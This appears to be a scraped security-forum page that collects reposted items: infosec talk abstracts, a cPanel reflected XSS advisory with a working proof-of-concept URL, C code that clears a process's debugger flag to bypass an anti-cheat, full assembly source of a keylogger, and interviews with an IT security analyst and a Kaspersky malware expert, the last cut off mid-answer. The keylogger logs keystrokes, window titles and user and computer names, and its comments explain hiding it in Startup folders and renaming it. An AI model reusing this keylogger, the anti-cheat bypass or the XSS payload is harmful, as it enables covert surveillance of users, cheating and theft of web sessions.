Nytro

Din cauza unor probleme nasoale cu logarea am repus salvarea IP-urile reale si nu random(). Daca chiar vreti sa nu aveti IP-urile salvate, sunteti si voi in stare sa folositi Tor sau altceva. Poate la sfarsitul anului, sau pe 1, sterg din nou toate IP-urile din DB. Poate facem asta saptamanal. Vedem.

Building A Web Attacker Dashboard With Modsecurity And Beef Description: Abstract The Browser Exploit Framework (BeEF) Project is extremely popular with application pentesters as it is a powerful tool for demonstrating the impacts of leveraging XSS vulnerabilities to achieve wider compromise into an organization. What if, however, we flipped the BeEF use-case around and instead put it in the hands of web application defenders? By using the open source ModSecurity WAF, we can dynamically hook web attackers with BeEF and monitor their activities and initiate various counter-meseasures. ***** Speaker: Ryan Barnett, Lead Security Researcher, Trustwave SpiderLabs, Metro DC Ryan C. Barnett is renowned in the web application security industry for his unique expertise. After a decade of experience defending government and commercial websites, Ryan joined Trustwave SpiderLabs Research Team. He specializes in application defense research and leads the open source ModSecurity web application firewall project. In addition to his commercial work at Trustwave, Ryan is also an active contributor to many community-based security projects. He serves as the Open Web Application Security Project (OWASP) ModSecurity Core Rule Set project leader and contributor on the OWASP Top Ten and AppSensor projects. He is a Web Application Security Consortium Board Member and leads the Web Hacking Incident Database and the Distributed Web Honeypot projects. At the SANS Institute, he is a certified instructor and contributor on the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors projects. Ryan is regularly consulted by news outlets who are seeking his insights and analysis on emerging web application attacks, trends and defensive techniques. Ryan is a frequent speaker and trainer at key industry events including Blackhat, SANS AppSec Summit and OWASP AppSecUSA. Ryan has authored two web security books with titles such as: "Preventing Web Attacks with Apache" from Pearson Publishing and the forthcoming "Web Application Defender's Cookbook: Battling Hackers and Protecting Users" from Wiley Brothers Publishing. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Building a Web Attacker Dashboard with ModSecurity and BeEF - Ryan Barnett on Vimeo Sursa: Building A Web Attacker Dashboard With Modsecurity And Beef

Top Ten Web Defenses Description: Abstract We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications. The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed. ***** Speaker Jim Manico, VP Security Architecture, WhiteHat Security Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur… Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Top Ten Web Defenses - Jim Manico on Vimeo Sursa: Top Ten Web Defenses

C-Panel Cross Site Scripting C-Panel suffers from a reflective cross site scripting vulnerability in manage.html. CPanel Non Persistent XSS Details ============= Product: Cpanel Security-Risk: High Remote-Exploit: yes Vendor-URL: http://www.cpanel.net Advisory-Status: NotPublished Credits ============= Discovered by: Rafay Baloch of RafayHackingArticles(RHA) Affected Products: ============= Cpanel's Latest Version Description ============= "Simploo website management." More Details ============= I have discsovered a non persistent Cross site scripting (XSS) inside Cpanel, the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ============= Log into your CPanel accoutn and navigate to the following link: https://localhost/frontend/x3/mail/manage.html?account= Now insert your xss payload inside account parameter. Exploit ============= https://localhost/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E Solution ============= Edit the source code to ensure that input is properly sanitised. Timeline ================ Use of terms ================ -- Warm Regards, Rafay Baloch http://rafayhackingarticles.net http://techlotips.com Sursa: C-Panel Cross Site Scripting ? Packet Storm

Hook Analyser Malware Tool 2.2 Authored by Beenu Arora | Site hookanalyser.blogspot.com Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. Changes: The UI and modules of the project have been re-written. The interactive mode is now more verbose. The (static) malware analysis module has been enhanced. Bug fixes and other improvements. Download: http://packetstormsecurity.org/files/download/119087/HookAnalyser2.2.zip Sursa: Hook Analyser Malware Tool 2.2 ? Packet Storm

[h=1]Q&A: Interview with an IT Security Analyst[/h]Tim Heard December 24, 2012 (Rebecca Turner is an IT security analyst, employed by a leading global services provider. Rebecca began her career in IT as a helpdesk technician and has advanced through a number of roles. She has considerable experience as a field engineer, and also as a systems administrator.) Q: I see from your background that you began your IT career working as a helpdesk technician. How did you get interested in IT security, and what led to you being in your current role? A. I was an office manager for several years, and helped bring a small office into the computer age, just by reading and a few community college classes. I found that I really, really enjoyed PCs and figuring out how to set them up. I realized that I didn’t want to be a secretary the rest of my life, so I kept going in college and eventually landed a junior helpdesk role 13 years ago. Q. What are the main duties of your current position? A. I now work in IT Security. I scan PCs when they are infected, perform network and local vulnerability assessments, and handle patching and reporting. Q. How well do you feel your training and education have prepared you for this position? A. I think my early training (A+, Net+ and college) was very valuable in my technical role. It gave me a solid foundation to continue on with. Q. What specific certifications have you earned? A. A+, Net+, Novell CNE 6, Security+, CISSP. Q. Looking back at your career, which of them have been the most helpful? A. A+ and Net+ for the early years, Security+ and CISSP for my current position. Q. Which of them, if any, have best prepared you for your current role, and why? A. CISSP, as the study gave me great overview of the security world Q. Are there certain certification programs which you feel, in retrospect, weren’t all that helpful in terms of preparing you for your career? A. My Novell CNE. I only got it to get a new job. I really never used the information. Q. If you could take additional coursework right now, or earn an additional certification, what would it be, and why? A. CEH, SANS 504. I want to learn more about pen testing and ethical hacking. Q. What are the main challenges someone faces as an IT security analyst that someone who is thinking of entering the field might not think about? A. It’s very important to have a technical background when going into the security field. At least five years would be my recommendation. Q. What advice would you give an IT generalist who is thinking of pursuing a career in IT Security? A. Get your technical certs, like A+ and Net+. Make sure you have at least five years of good hands-on technical troubleshooting. Q. What do you think are the prospects for this field in terms of job growth? A. I think the prospects are great. I think the job growth is only going to go up Q. What changes do you expect to see in the coming years? A. I HOPE that hiring managers learn the differences in the various certs and what they are used for. Why ask for a CISSP when you really need someone who just has a Security+? I expect to see more security generalist jobs, as companies try to cut costs. The more technical you are, the better path I think you’ll have since you’ll have the experience necessary to be that generalist. I also think we’re going to see many more compliance scanning jobs (PCI, HIPAA, SOX, etc), as more companies get into that kind of business. Sursa: InfoSec Institute Resources – Q&A: Interview with an IT Security Analyst

Four Axes Of Evil Description: Abstract This presentation focuses on large-scale internet vulnerability research from four unique perspectives, identifying patterns and exposing security issues that are difficult to identify using traditional approaches. ***** Speaker HD Moore, CSO, Rapid7 HD is Chief Security Officer at Rapid7 and Chief Architect of Metasploit, the leading open-source penetration testing platform. HD founded the Metasploit Project in the summer of 2003 with the goal of becoming a public resource for exploit code research and development. ***** Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Four Axes of Evil - HD Moore on Vimeo Sursa: Four Axes Of Evil

Bug Bounty Programs Description: Speakers Michael Coates Director of Security Assurance, Mozilla Michael Coates is the Director of Security Assurance at Mozilla. He is responsible for Mozilla’s software and infrastructure security which includes Firefox, web applications, and critical infrastructure. In this role he sets the security assurance strategy to integrate security into the development lifecycle of all applications and ensures that the organization's infrastructure is designed to minimize risk and protect critical data. | | Michael is also the Chairman of the OWASP board, … Chris Evans Troublemaker, Google Chris Evans is the author of vsftpd, a vulnerability researcher and for a paycheck, he built and now looks after the Google Chrome Security Team. Unruly bunch. | | Details of vsftpd are at security.appspot.com/vsftpd.html. His research includes vulnerabilities in all the major browsers (Firefox, Safari, Internet Explorer, Opera, Chrome); the Linux and OpenBSD kernels; Sun's JDK; and lots of open source packages. He blogs about some of his work at scarybeastsecurity.blogspot.c… Jeremiah Grossman CTO, WhiteHat Security Jeremiah Grossman is the Founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web security R&D and industry outreach. Over the last decade, Mr. Grossman has written dozens of articles, white papers, and is a published author. His work has been featured in the Wall Street Journal, Forbes, NY Times and hundreds of other media outlets around the world. | | As a well-known security expert and industry veteran, Mr. Grossman has been a guest speaker on six con… Adam Mein Security Program Manager, Google Some people like to find bugs; Adam likes to make sure they get fixed. He gets lots of opportunities to fulfill this (admittedly, sad) ambition as Manager of Google's Vulnerability Management team and Web Reward Program. | | Outside of work, Adam spends most of his time chasing around his 10 month old son and supporting his beloved Canberra Raiders rugby league team. Alex Rice Product Security, Facebook Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Bug Bounty Programs - Michael Coates, Chris Evans, Jeremiah Grossman, Adam Mein, Alex Rice on Vimeo Sursa: Bug Bounty Programs

[h=1]Hook (bypass) kernel32.dll IsDebuggerPresent[/h]By: [h=3]try catch[/h]I've found a code that bypass the IsDebuggerPresent in a anti cheat, but i don't know how use. Follow the code: #include <stdio.h> #include <stdlib.h> #include <windows.h> char KillIsDebuggerPresent(PROCESS_INFORMATION pi) { DWORD tib, pib; LDT_ENTRY segselector; CONTEXT TempContext; TempContext.ContextFlags = CONTEXT_SEGMENTS; GetThreadContext(pi.hThread,&TempContext); GetThreadSelectorEntry(pi.hThread, TempContext.SegFs, &segselector); tib =((segselector.HighWord.Bytes.BaseHi) << 24) + ((segselector.HighWord.Bytes.BaseMid) << 16) + (segselector.BaseLow); //printf("TIB @ %X\n", tib); if(ReadProcessMemory(pi.hProcess,(void *)(tib+0x30), &pib, sizeof(pib), NULL) == 0) { printf("Could not get PIB from TIB !\n"); return 0; } else { char debug_info = 0xFF; // printf("PIB @ %X\n", pib); pib += 2; if(ReadProcessMemory(pi.hProcess,(void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) { printf("Unable to read from PIB !\n"); return 0; } else { // printf("Old debug value in PIB: %X\n", debug_info); if(debug_info != 0x01) { printf("PB value unexpected. Aborting!"); return 0; } else { debug_info = 0; if(WriteProcessMemory(pi.hProcess,(void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) { printf("Could not write new value into PIB !\n"); return 0; } else { //printf("PIB debug value override ok!\n"; return 1; } } // debug info } // read pib } // read tib } int main() { KillIsDebuggerPresent(...); return 0; } Sursa: Hook (bypass) kernel32.dll IsDebuggerPresent - rohitab.com - Forums

[h=1]Basic key logger but very small[/h]By: [h=3]drew77[/h] This isn't fancy like some I have seen here, but it is less than 5000 bytes. I am interested in a keylogger that would save screenshots at adjustable intervals as well as typed input. ;******************************************************************************************* ; (BEST Viewed with NOTEPAD) ; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved ; ; "We Don't NEED no STINKIN DLL!"......ENJOY! vist <a href="http://testing.OnlyTheRightAnswers.com" class="bbc_url" title="External link" rel="nofollow external">http://testing.OnlyTheRightAnswers.com</a> ; ; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook ; This Program is for Educational Proof Of Concept Use ONLY! ; ; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks ; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration ; this proof of concept was created. Log Items include: ; ; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name ; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL ; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in ; the startup folder of any user, or for all users. ; ; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this ; can be done automatically by simply placing the program in the: ; ; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder ; ; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt ; ("You can change the File to Hidden if needed") ; ; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off ; ; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level. ; ; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt ; ;******************************************************************************************* .386 .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\advapi32.inc include \masm32\include\msvcrt.inc include \masm32\macros\macros.asm includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\msvcrt.lib ;== Prototypes ================================================================= KeyBoardProc proto :DWORD, :WPARAM, :LPARAM ;== Prototypes ================================================================= pushz macro szText:VARARG local nexti call nexti db szText,00h nexti: endm .data CopyRight db "CopyRight 2005, ZOverLords@Yahoo.com" Vist db "http://testing.OnlyTheRightAnswers.com " hBuffer dd ? hComputerName db 32 dup(0) hCurrentThreadPiD dd 0 hCurrentWindow dd 0 hDateFormat db "dd MMM yyyy", 0 hDomaineName db 128 dup(0) hFile dd 0 hHook dd 0 hmodul MODULEENTRY32 <> hSnapShot dd 0 hTimeFormat db "hh:mm:ss tt", 0 hUserName db 32 dup(0) msg MSG <> onlyOneCopy db "Global\zkl",0 .code main: invoke CreateMutexA,0,0,ADDR onlyOneCopy invoke GetLastError ; check to make sure we are the only copy running call GetLastError ; for fast user switching we still support one cmp eax,ERROR_ALREADY_EXISTS ; copy per user, but if we are the second copy je more_than_one_copy ; trying to start, we exit xor ebx, ebx invoke RegisterHotKey, NULL, 0badfaceh, MOD_CONTROL or MOD_ALT, VK_F11 pushz "ab" ; append in binary mode pushz "ZKeyLog.txt" ; name of log file call fopen add esp, 2*4 ; all c lib functions need fixup.. ;mov [hFile], eax ; save our file number mov hFile,eax invoke GetModuleHandleA, NULL invoke SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx mov [hHook], eax ; ok here is our hook handle for later invoke GetMessageA, ADDR msg, NULL, NULL, NULL invoke UnhookWindowsHookEx, hHook invoke fclose, hFile more_than_one_copy: invoke ExitProcess, 0h ;############################################################## KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD LOCAL lpKeyState[256] :BYTE LOCAL lpClassName[64] :BYTE LOCAL lpCharBuf[32] :BYTE LOCAL lpDateBuf[12] :BYTE LOCAL lpTimeBuf[12] :BYTE LOCAL lpLocalTime :SYSTEMTIME ;---------------------------- lea edi, [lpKeyState] ; lets zero out our buffers push 256/4 pop ecx xor eax, eax rep stosd ; sets us up for doubleword from EAX mov eax, wParam cmp eax, WM_KEYUP ; only need WM_KEYDOWN je next_hook ; bypass double logging cmp eax, WM_SYSKEYUP ; only Need WM_SYSKEYDOWN je next_hook ; bypass double logging invoke GetForegroundWindow ; get handle for currently used window ( specific to NT ) cmp [hCurrentWindow], eax ; if its different to last one saved.. je no_window_change ; bypass all the headings mov [hCurrentWindow], eax ; save it for use now and compare later invoke GetClassName, hCurrentWindow, ADDR lpClassName, 64 invoke GetLocalTime, ADDR lpLocalTime invoke GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12 invoke GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12 invoke GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD mov hSnapShot,eax mov hmodul.dwSize, sizeof MODULEENTRY32 invoke Module32First,hSnapShot,addr hmodul invoke CloseHandle,hSnapShot invoke GetWindowText, hCurrentWindow, ADDR lpKeyState, 256 lea esi, [hmodul.szExePath] ; print the current program exe name push esi lea esi, [lpTimeBuf] ; print the formatted time push esi lea esi, [lpDateBuf] ; print the formatted date push esi pushz 13,10,"[%s, %s - Program:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 lea esi, [lpClassName] ; print the current window class name push esi lea esi, [lpKeyState] ; print the current window title push esi pushz 13,10,"[ Window Title:%s - Window Class:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 mov hBuffer, 128 ; get the current domain name invoke GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer mov hBuffer, 32 ; get the current computer name invoke GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer mov hBuffer, 32 ; get the current user name invoke GetUserName, ADDR hUserName, ADDR hBuffer lea esi, [hUserName] ; print the current user name push esi lea esi, [hComputerName] ; print the current computer name push esi lea esi, [hDomaineName] ; print the current domain name push esi pushz "[ Domain:%s - Computer:%s - User:%s]",13,10 push [hFile] call fprintf add esp, 3*4 invoke fflush, hFile no_window_change: mov esi, [lParam] ; we don't want to print shift or capslock names. lodsd ; it just makes the logs easier to read without them. cmp al, VK_LSHIFT ; they are tested later when distinguishing between je next_hook ; bypass left shift Key for upper/lowercase characters cmp al, VK_RSHIFT je next_hook ; bypass right shift Key cmp al, VK_CAPITAL je next_hook ; bypass caps lock Key cmp al, VK_ESCAPE je get_name_of_key ; we Want escape characters cmp al, VK_BACK je get_name_of_key ; we want backspace key cmp al, VK_TAB je get_name_of_key ; we want tab key ;------------------ lea edi, [lpCharBuf] ; zero initialise buffer for key text push 32/4 pop ecx xor eax, eax rep stosd ;---------- lea ebx, [lpKeyState] push ebx call GetKeyboardState ; get current keyboard state invoke GetKeyState, VK_LSHIFT xchg esi, eax ; save result in esi invoke GetKeyState, VK_RSHIFT or eax, esi ; al == 1 if either key is DOWN mov byte ptr [ebx + 16], al ; toggle a shift key to on/off invoke GetKeyState, VK_CAPITAL mov byte ptr [ebx + 20], al ; toggle caps lock to on/off mov esi, [lParam] lea edi, [lpCharBuf] push 00h push edi ; buffer for ascii characters push ebx ; keyboard state lodsd xchg eax, edx lodsd push eax ; hardware scan code push edx ; virutal key code call ToAscii ; convert to human readable characters test eax, eax ; if return zero, continue jnz test_carriage_return ; else, write to file. get_name_of_key: ; no need for large table of pointers to get asciiz mov esi, [lParam] lodsd ; skip virtual key code lodsd ; eax = scancode shl eax, 16 xchg eax, ecx lodsd ; extended key info shl eax, 24 or ecx, eax push 32 lea edi, [lpCharBuf] push edi push ecx call GetKeyNameTextA ; get the key text push edi pushz "[%s]" jmp write_to_file test_carriage_return: push edi pushz "%s" cmp byte ptr [edi], 0dh ; carriage return? jne write_to_file mov byte ptr [edi + 1], 0ah ; add linefeed, so logs are easier to read. write_to_file: invoke fprintf, hFile next_hook: invoke CallNextHookEx, hHook, nCode, wParam, lParam ret KeyBoardProc ENDP end main hFile dd 0 invoke fclose, hFile C:\masm32\SOURCE\Log.asm(110) : error A2148: invalid symbol type in expression : fclose Sursa: Basic key logger but very small - rohitab.com - Forums

Interview with Kaspersky Chief Malware Expert Alex Gostev December 24, 2012, 11:50AM by Michael Mimoso The last year has seen a lot of changes in the threat landscape, with the emergence of a number of new cyber espionage tools such as Gauss and Flame, as well as an increase in the volume of malware targeting mobile platforms such as Android. Recently, Alex Gostev, the chief malware expert at Kaspersky Lab, answered questions submitted by users on Facebook, discussing the evolution of antimalware solutions, the threats to mobile devices and how governments around the world are handling the cybercrime explosion. Hi Alex, I would like to ask about cyber spying. You know, we make a lot of overseas calls via Skype in business today. Is there a wiretapping risk with Skype calls?. Alex Gostev: If the computer of the Skype user is infected with a malicious program capable of recording voice traffic (or intercepting data from a microphone), then, naturally, any voice communication via Skype can be intercepted. This is not just a theoretical possibility; incidents like this have in fact taken place repeatedly, and have even involved software created by law enforcement agencies. For example, an incident of this kind took place in Germany last year. Are governments around the world coping with cybercrimes or just studying it? Alex Gostev: The main problem with fighting cybercrime today is its global character. Undoubtedly, many countries in the world have achieved notable success in combating this threat; however, the most serious crimes can only be investigated successfully if there is international cooperation. Unfortunately, this is an area where problems do exist: a number of countries, for one reason or another, are not involved in international initiatives to fight cybercrime. How did you manage to become who you are? Where did you get all that knowledge? Alex Gostev: That’s a tough one J It was back in 1994 when I came across my first computer viruses; I only joined Kaspersky Lab in 2002. So you could say I gained most of my knowledge about viruses on my own. Take my word for it: there is sufficient information available on the Internet both to learn to analyze malicious programs and to understand the current trends in cybercrime and threat evolution. So, I suggest you read as many sites and expert blogs as you can, and try to reproduce their findings on your own; try to understand how the experts came to the conclusions they write about. Kaspersky Lab has three expert blogs: Securelist, Threatpost and our new consumer blog. Why is it that virus makers mostly target the Windows operating system? Alex Gostev: The answer is simple: over 90% of users are on Windows. There is a similar situation when it comes to mobile platforms: Android leads the pack both in terms of users and malware. They say that it’s cyber war out there. Has Kaspersky been attacked? Alex Gostev: Just like any other company involved in information security, Kaspersky Lab is a frequent target for attacks. This is to be expected. And, of course, we use the most reliable technologies to protect us from such attacks. I want to work for Kapersky’s GReAT team. What would be the best college to finish and courses to take? Alex Gostev: A technical education is important. There’s no one college or set of courses that’s the best to become a security researcher, but a good knowledge of operating systems, programming languages and a willingness to work hard are essential. How many threats are added to Kaspersky databases daily to provide effective protection to everyone? What’s the comparison to free antivirus solutions? Alex Gostev: At the present time, we detect some 200,000 new malicious programs every day. Naturally, it takes serious resources – both human and technical – to collect and process such huge volumes of threats. Besides malicious files, there are also other types of threats including malicious sites, network attacks, exploits etc. that we also need to keep tabs on. All this requires an extensive financial outlay. Independent testing shows that we have an edge over freeware security tools. With nations increasingly using harmful software on their enemies what do you think about this? What’s Kaspersky’s stance on this? Has Kaspersky been approached by governments? What do you foresee for the future of industrial/governmental cyber wafrare. What’s Kaspersky’s future in this? Alex Gostev: That’s a difficult question that really merits a separate article. In a nutshell, our first, major priority is to protect our users. So we will protect them from all types of malicious programs regardless of who creates them. It is also our aim to communicate a simple message to the world’s governments: any malware can also be used against its creators; unintended targets can also become victims. Cybercrime must become subject to international law and must come under the regulations and monitoring of the global community. Anything to protect us from our own government? Alex Gostev: We protect against malicious programs without making any distinctions as to who created them. I know that Windows phone is not considered a virus target, but for those of us who want more security for our phone and feel left out, why is it so hard to make virus protection for Windows Phones? Alex Gostev: There are no problems whatsoever about creating antivirus protection for Windows Phone (at least, Kaspersky Lab does not have any problems doing it). Why do people say Apple computers don’t get viruses when they actually get more than people think? Alex Gostev: These are old stereotypes that were created primarily by Apple themselves. Apple have claimed for a long time that their computers are much better protected. Eventually, they admitted that malware does exist for Apple computers and even incorporated a primitive antivirus scanner into OS X. Microsoft, for instance, also had to spend a decade or so learning to take virus threats seriously. Apple is only taking its first steps along this road, but we think they are moving in the right direction, especially if you look at the protection system on the iPhone. Alex, what’s the best way of preventing your computer being infected and locked and asked to pay a steep fee to unlock it? Alex Gostev: In the overwhelming majority of cases involving extortion malware, or ransomware, the victim computer is infected via a web browser. This is usually down to vulnerabilities in Java, Adobe Flash or in the browsers themselves. All these vulnerabilities have long been known and patched by the vendors. So, your first step should be to install all the latest patches and updates for your software on a regular basis. What are the main Android threats? Kaspersky Security Bulletin 2012. Malware Evolution - Securelist See point 3 (“The explosion of Android threats”) and item 10 (“Mobile malware”) in this security bulletin. Why does Kaspersky often (maybe very often) recognize “good” software as malicious? Alex Gostev: I have to disagree with you on this one. Kaspersky Lab’s products have one of the lowest false positive rates in the entire industry; independent test results back up this claim. We couldn’t possibly have received the “Product of the year” award unless we had demonstrated the fewest false positives in dedicated testing. Which web browser do you prefer? Which one is more secure? Which one is the best solution for Kaspersky products? Alex Gostev: At the current time, I prefer Google Chrome. Which browser is the safest? Well, the answer to that is changing all the time. The situation can change in an instant – the discovery of a 0-day vulnerability would immediately turn the safest browser into the most vulnerable one. Therefore, apart from keeping an eye on the browser vulnerability situation, it is also advisable to complement your browser with dedicated protection tools, such as a sandbox, whitelisting etc. All these things are implemented in Kaspersky Lab’s products. What are the most ”fashionable” viruses today? What was the most unusual virus detected last year? Alex Gostev: Depends what you mean by “fashionable”. If we’re talking about high-profile malware, it would primarily be a whole new generation of malware in the Middle East which includes Flame, Duqu, Gauss, miniFlame, Wiper. All these kept us fairly busy throughout the year, both in terms of searching for and analyzing the findings. The realm of cyber weapons, i.e. malware created at the state level to attack the citizens, companies and authorities of other countries, is probably the hottest and most interesting topic right now. As for unusual malware, there were traits in every single program mentioned above that we thought (and still think) were unusual. For instance, one of the Gauss modules installs a modified proprietary font called Palida Narrow into the system. Why it does this remains a mystery. Another example is the propagation module incorporated into the Flame worm –it helps the worm spread via local area networks, and that is a whole other story. Its creators have not only successfully implemented an unprecedented MD5 cryptographic attack but have also created a “real” Microsoft certificate. This is way beyond a 0-day vulnerability – this is “god mode”. Nothing like this has occurred before. Is being a virus analyst a difficult job? Alex Gostev: It’s only difficult for the first few years. After that, once you’ve gained experience, it gets easier. I remember about six years ago we organized competitions in our Virus Lab to see who could analyze malware the fastest. The record was 43 seconds from a file arriving for analysis till a detection was added. On the other hand, virus analysis is only a small part of the job. You have to be well informed about all developments, including news from your competitors and news from the other side of the front line; you need to be aware of where it’s all going and what will happen tomorrow. I suppose, this is the most difficult part, and it’s getting more difficult every day. What new types of malware does the near future have in store for us? Alex Gostev: There are unlikely to be any new types of malware. All the generic types of malware behavior have long been identified and malware, including viruses, worms, Trojans and exploits, are evolving along those lines. Of course, dozens of subtypes exist within each category, such as Trojan cryptographers, banking Trojans, network worms etc. However, malware evolution takes place exclusively in terms of seizing new platforms or operating systems – mobile Trojans are a vivid example. From the point of view of technology, everything is the same, but with new platforms and new possibilities, such as the sending of SMS text messages. Therefore, we expect all the conventional types of threats to migrate in the near future from personal computers to the entire range of modern devices. Alex, do you keep a diary for yourself? E.g. I came across such and such a malicious program today. I was able to treat it in such and such a way. Tried such and such a dish and liked it. The weather was nice, etc. Alex Gostev: No, I simply don’t have time for that. Time and again I think that it might be worthwhile writing down how my research is going. I think it would make a pretty interesting book. On the other hand, many of the things we’re involved in and the things we’re aware of cannot be published (yet). Which operating system do you use? Which do you think is the safest for desktops? Alex Gostev: I am not a dedicated fan of any specific operating system; in fact, I have a very simple view on them: for every task, there exists a suitable operating system. I arrange my work accordingly. In a single day I can work under Windows, OS X and Linux, not to mention mobile platforms for phones and tablet PCs. There are no secure desktop operating systems. Any operating system can only be called secure on a conditional basis until the next 0-day vulnerability emerges. When this happens, it instantly turns the safest operating system into the most vulnerable one. I’m talking here about a situation where the vulnerability is publicly disclosed. As for privately-known vulnerabilities, well they always exist for any given operating system. How much of his work time does a senior virus analyst put into practical, hands-on work, such as reverse engineering, debugging and sandboxing? Alex Gostev: It depends on the time of the year and the research project the team is working on at a specific time. Sometimes, I can spend 80% of the day on hands-on research of a specific piece of malware. That may last for, say, a week. Sometimes I don’t touch a single malware file for an entire day. If you look at the bigger picture, I’d say I spend no more than 20% of my time throughout the year on hands-on research. However, when I was a virus analyst processing the inbound malware traffic, it took up 100% of my time. Now, I have to do a lot of non-core activities, such as giving answers to your questions What make of smartphone or telephone does Alexander use (which manufacturer, model)? Does he have a mobile security solution installed on it? Alex Gostev: At the moment I have an iPhone 3. It is a corporate phone. I don’t have any antivirus on it, because: a) no antivirus solution exists for iPhones; it has not been jailbroken c) there are no viruses for non-jailbroken iPhones anyway. How do I properly uninstall Kaspersky Lab’s products so no garbage is left in the system and registry? Alex Gostev: The “proper” way is to use the standard uninstaller. Should anything go wrong and the result is not satisfactory, use the dedicated removal tool: Removal tool for Kaspersky Lab products How can I get rid of my paranoia and obsession that there is a Trojan in the system, or a vulnerability is being exploited? Alex Gostev: Why would you want to get rid of it? When it comes to IT security paranoia is actually a positive thing, as it makes you more careful about what you do and how you do it. It makes you try to figure out how the system works, promotes your self-development and broadens your outlook. In other words, it’s a good thing. At work, I often have to compile all types of DLL files. Security software pretty often reports them as being potentially dangerous, even after I block heuristic analysis. What can I do other than adding exclusion rules into the work directory? Alex Gostev: I can’t give recommendations unless I have a complete understanding of which files you use, which functions you use, what type of warnings your security software gives, what it specifically reports etc. If you are totally sure that your files are clean (beware though, there may be surprises, e.g. check out the history of the Induc virus), then go ahead and add them to the exclusion rules and contact your security provider’s support line and let them find out what the reasons are for the false positives. How safe is it to use cloud-based storage? Do you know of any cases where the cloud has been infected? Alex Gostev: Ah, this is a major topic. There was a recent newspaper publication about this in which I feature. Unfortunately, it’s only in Russian. For those of you who know Russian, check it out here: ?-?????????? Business Guide (67091) - "???? ??????? ?? ?????, "????????" ?????????? ?????? ????????" Can you please tell us about how Kaspersky’s Virus Encyclopedia documentation is created. Alex Gostev: These days, 99% of the malware descriptions in Kaspersky’s Virus Encyclopedia have been created by a robot using standard templates and based on automatic analysis of files. Several thousand old descriptions also exist that were written by humans (yes, there used to be time when a new dedicated description could be created for each new virus). Several hundred of them were created specifically by me. The management of one large company says that Kaspersky Lab writes viruses and creates zombie networks to infect computers in the Russian segment of the Internet, in order to sell more of their products and provide consulting services. Can you please comment on this. I can’t disclose the name of the company as I work for it. Alex Gostev: I recommend you change your employer. If your management has such a mindset, you never know what they’ll come up with next. Can you dispel the myth that working in IT security is the preserve of men. It would be great if you could also provide some supporting facts. Alex Gostev: This is in fact not a myth, but the current reality. Men do indeed make up the majority of experts in this field. Having said that, there are women who work in IT security, and all of them demonstrate a greater professionalism than most men working in this area. In my private view, a woman working in IT security has to demonstrate a very high level of professionalism. All the women I know who work in this sphere, are very good specialists, but there are so few of them. Furthermore, they are so well known in their profession (especially in Russia) that no proof is really necessary. What can you say about the antivirus that is incorporated in Windows 8? This takes away quite a bit business from the security software manufacturers. How would you comment on this? Alex Gostev: It’s been quite a while since it was incorporated, and quite a while since it’s been “taking away business”. The thing is, it never did in fact take any business. The simple fact is that in order to develop successful security solutions, a company needs to specialize in developing those solutions. That must be their core business. That cannot be said of Microsoft. My friends say Kaspersky Anti-Virus is a resource-hungry monster, and recommend that I use free antivirus solutions (I won’t advertise them here). Their argument is: free antivirus is no worse, in fact they are better in many respects. Is this correct? Alex Gostev: No, and I can’t be 